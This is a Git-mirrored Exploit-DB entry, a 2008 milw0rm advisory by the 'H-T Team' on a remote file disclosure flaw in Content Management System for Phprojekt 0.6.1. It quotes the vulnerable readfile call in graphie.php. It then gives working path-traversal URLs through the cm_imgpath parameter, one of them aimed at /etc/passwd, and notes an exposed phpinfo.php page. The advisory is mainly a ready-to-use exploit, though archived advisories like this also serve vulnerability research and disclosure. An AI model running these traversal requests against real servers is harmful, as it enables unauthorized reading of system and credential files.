bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/5510.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

33 lines
No EOL
1.1 KiB
Text
Raw Blame History

--------------------------------------------------------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
--------------------------------------------------------------------------------------------------------------
= Author : HouSSaMix
= Script : Content Management System for Phprojekt
= version : 0.6.1
= Download : http://www.mariovaldez.net/software/cm_4p/download.php
= BUG : Remote File Disclosure Vulnerability
Vulnerable CODE :
~~~~~~~~ graphie.php ~~~~~~~~~~~~~~~~~
readfile ($cm_imgpath . "/t.gif");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
variable " $cm_imgpath " not declared
= Exploit :
target.com/cm/graphie.php?cm_imgpath=../.././../[file]
target.com/cm/graphie.php?cm_imgpath=../.././../etc/passwd
= see phpinfo
target.com/cm/phpinfo.php
= greetz : V40 - marwen.neo and all muslims Hackers
=================================================================================================================
# milw0rm.com [2008-04-27]
Reference in a new issue View git blame Copy permalink